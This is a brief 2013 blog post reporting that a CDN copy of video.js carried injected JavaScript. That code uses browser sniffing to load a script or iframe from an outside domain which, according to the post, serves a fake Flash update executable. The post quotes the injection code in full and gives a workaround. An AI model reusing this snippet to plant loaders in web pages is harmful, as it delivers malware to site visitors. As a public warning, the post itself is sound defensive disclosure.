Sunday, 15 September 2013

malware update_flash_player.exe found in http://vjs.zencdn.net/c/video.js?ver=3.5.1

malware update_flash_player.exe found in
http://vjs.zencdn.net/c/video.js?ver=3.5.1

PROBLEM
link:
http://vjs.zencdn.net/c/video.js?ver=3.5.1
contains injected javascript code:
if(navigator.appVersion.indexOf("MSIE")!=-1){
document.write('<script
src="http://cdn.adsbarscipt.com/links/jump/"></script>');
}
if(navigator.appVersion.indexOf("Chrome")!=-1){
document.write('<iframe
src="http://cdn.adsbarscipt.com/links/flash/?updnew" width="200"
height="200"></iframe>');
}
that causes IE and Chrome to download malware:
update_flash_player.exe
SOLUTION
use link without "ver" parameter: http://vjs.zencdn.net/c/video.js
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)